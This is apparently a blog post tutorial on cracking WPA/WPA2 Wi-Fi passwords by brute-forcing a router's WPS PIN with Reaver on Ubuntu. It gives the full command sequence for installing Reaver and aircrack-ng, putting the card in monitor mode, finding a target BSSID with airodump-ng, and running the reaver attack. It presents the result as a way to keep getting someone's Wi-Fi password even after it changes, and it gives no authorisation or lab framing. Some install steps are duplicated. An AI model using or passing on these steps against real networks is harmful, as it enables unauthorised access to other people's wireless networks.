In this tutorial we are going to use a new vulnerability in WPA and WPA 2 (PSK/TKIP)Wireless passwords, this weak point is to attack WPS; Which is Wireless Protected Setup : this type of setup is built in 90% of routers to allow easy establishment of secure home wireless by the user, though it has been shown to fall to BruteForce Attacks. This BruteForce attack will try all combinations of Router’s PIN number (Provided by WPS) and access the router to reveal the password. This type of hack have many benefits such as: You can always have the Wireless Password even if It’s changed by knowing the PIN number.
How To Hack WPA/WPA2 Passwords using Ubuntu (Reaver)
2) Download
(Better Download the Latest Version ) Placed in a specified folder.
3) Open a Terminal and type : tar xvfz reaver-1.4.tar.gz
4) Install dependencies: sudo apt-get install libpcap-dev
To test if Reaver have been successfully installed, Open a Terminal and Type ‘reaver’ and hit enter, it should list all Reaver’s sub commands.
Step 1 (Setting up Reaver 1.4 )
1) Open terminal and type: sudo -s and type your password.2) Download
(Better Download the Latest Version ) Placed in a specified folder.
3) Open a Terminal and type : tar xvfz reaver-1.4.tar.gz
4) Install dependencies: sudo apt-get install libpcap-dev
then : sudo apt-get install libsqlite3-dev
Note: libpcap and libsqlite3 maybe included in your Ubuntu version but they are very important.
4) Enter the folder by typing : cd reaver-1.4/src
5) Type: ./configure
6) Type : make
7) Type : make install
To test if Reaver have been successfully installed, Open a Terminal and Type ‘reaver’ and hit enter, it should list all Reaver’s sub commands.
Step 2 ( Hacking WPA/WPA2 Wireless)
After installing reaver 1.4, it’s time to proceed to the main part which is hacking wireless passwords that uses WPA/WPA2 Encryption.
Requirements:
Install aircrack-ng by typing sudo apt-get install aircrack-ng
Airodump-ng / Airmon-ng commands
Reaver 1.4 (Install in Step 1)
1) We need to have the wireless BSSID (Mac address) so we use airodump-ng :
Open a terminal and Type : airmon-ng start wlan0
Type : airodump-ng mon0
It will lists the available wireless passwords, now copy the BSSID of the Access Point ( e.g : 00:11:22:33:44:55 )
2) Starting the attack:
Type: reaver -i mon0 -b 00:11:22:33:44:55
Now it will start testing bruteforcing the PIN number of the vulnerability WPS (which we have spoke about it), and it will show you the WPA/WPA2 Password in the end of the Crack.
Note: You can use walsh -i mon0 to scan for vulnerable Access Points
Screenshot:
No comments:
Post a Comment